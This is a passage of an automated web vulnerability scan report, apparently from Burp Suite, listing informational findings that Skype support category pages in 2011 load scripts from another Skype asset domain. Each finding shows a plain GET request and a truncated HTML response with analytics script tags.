<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.401. https://support.skype.com/en-us/category/CALLER_IDENTIFICATION/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CALLER_IDENTIFICATION/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/CALLER_IDENTIFICATION/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:14 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49444


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.402. https://support.skype.com/en-us/category/CALLING/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CALLING/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/CALLING/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:01 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52171


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.403. https://support.skype.com/en-us/category/CALLING_PHONES_SKYPEOUT/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CALLING_PHONES_SKYPEOUT/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/CALLING_PHONES_SKYPEOUT/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:05 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52239


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.404. https://support.skype.com/en-us/category/CALL_FORWARDING/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CALL_FORWARDING/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/CALL_FORWARDING/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48876


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.405. https://support.skype.com/en-us/category/CALL_QUALITY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CALL_QUALITY/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/CALL_QUALITY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51095


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.406. https://support.skype.com/en-us/category/CALL_TRANSFER/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CALL_TRANSFER/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/CALL_TRANSFER/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:25 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48963


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.407. https://support.skype.com/en-us/category/CONFERENCE_CALLING/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CONFERENCE_CALLING/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/CONFERENCE_CALLING/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:06 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49565


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.408. https://support.skype.com/en-us/category/CONNECTION_ISSUES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CONNECTION_ISSUES/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/CONNECTION_ISSUES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51271


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.409. https://support.skype.com/en-us/category/CONTACTS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CONTACTS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/CONTACTS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52203


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.410. https://support.skype.com/en-us/category/CORDLESS_PHONES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CORDLESS_PHONES/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/CORDLESS_PHONES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54642


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.411. https://support.skype.com/en-us/category/CREDIT_CARDS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CREDIT_CARDS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/CREDIT_CARDS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51425


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.412. https://support.skype.com/en-us/category/EXTRAS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/EXTRAS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/EXTRAS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51144


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.413. https://support.skype.com/en-us/category/FACEBOOK/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/FACEBOOK/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/FACEBOOK/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54249


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.414. https://support.skype.com/en-us/category/FILE_TRANSFER/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/FILE_TRANSFER/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/FILE_TRANSFER/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:03 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49220


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.415. https://support.skype.com/en-us/category/GIFT_CERTIFICATES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/GIFT_CERTIFICATES/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/GIFT_CERTIFICATES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47693


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.416. https://support.skype.com/en-us/category/GIROPAY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/GIROPAY/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/GIROPAY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:25 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48703


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.417. https://support.skype.com/en-us/category/GROUP_VIDEO_CALLING/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/GROUP_VIDEO_CALLING/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/GROUP_VIDEO_CALLING/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:28 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49809


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.418. https://support.skype.com/en-us/category/INSTANT_MESSAGING_WITH_SKYPE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/INSTANT_MESSAGING_WITH_SKYPE/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/INSTANT_MESSAGING_WITH_SKYPE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:00 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51357


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.419. https://support.skype.com/en-us/category/MONEYBOOKERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/MONEYBOOKERS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/MONEYBOOKERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:13 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48690


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.420. https://support.skype.com/en-us/category/MYSPACEIM_WITH_SKYPE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/MYSPACEIM_WITH_SKYPE/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/MYSPACEIM_WITH_SKYPE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:29 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50650


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.421. https://support.skype.com/en-us/category/ONLINE_NUMBER_SKYPEIN/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/ONLINE_NUMBER_SKYPEIN/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/ONLINE_NUMBER_SKYPEIN/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:10 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51547


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.422. https://support.skype.com/en-us/category/PAYMENT_PRICES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PAYMENT_PRICES/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/PAYMENT_PRICES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:11 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53065


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.423. https://support.skype.com/en-us/category/PAYPAL/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PAYPAL/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/PAYPAL/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:14 GMT
